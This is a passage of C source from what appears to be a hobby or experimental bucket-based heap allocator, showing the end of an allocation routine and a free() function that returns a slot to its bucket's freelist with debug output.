// Update the Bucket Master Control with the new bucket
__update_master_ctrl_bucket(alloc_size, current_bucket);
alloc = __fastpath_new_bucket_alloc(current_bucket, alloc_size);
__dump_alloc(alloc);
__dump_bucket(current_bucket);
return alloc;
}
void free(void* ptr){
struct alloc* current_alloc;
struct bucket* current_bucket;
uint16_t offset;
if(ptr == NULL){ return; }
DEBUG_PRINT("\n+++++++++ FREE +++++++++\n");
/* 1. Retrieve the bucket based on the size */
current_alloc = ptr - sizeof(struct alloc);
DEBUG_PRINT("[DEBUG] Freeing alloc %p\n", current_alloc);
if(current_alloc->size > SMALL_BUCKET_MAX_SZ) {
// Should never be here since we still don't deal with that sizes
return;
}
current_bucket = __get_bucket_from_alloc(current_alloc);
DEBUG_PRINT("[DEBUG] Retrieved current bucket for %d is: %p\n", current_alloc->size, current_bucket);
/* 2. Update the bucket freelist count and freelist array */
offset = ( (void*) current_alloc - (void*) current_bucket->allocs ) / current_alloc->size;
current_bucket->freelist[current_bucket->freelist_count] = offset;
current_bucket->freelist_count++;
freelist_quarantine_time = time(NULL);
__dump_bucket(current_bucket);
}
```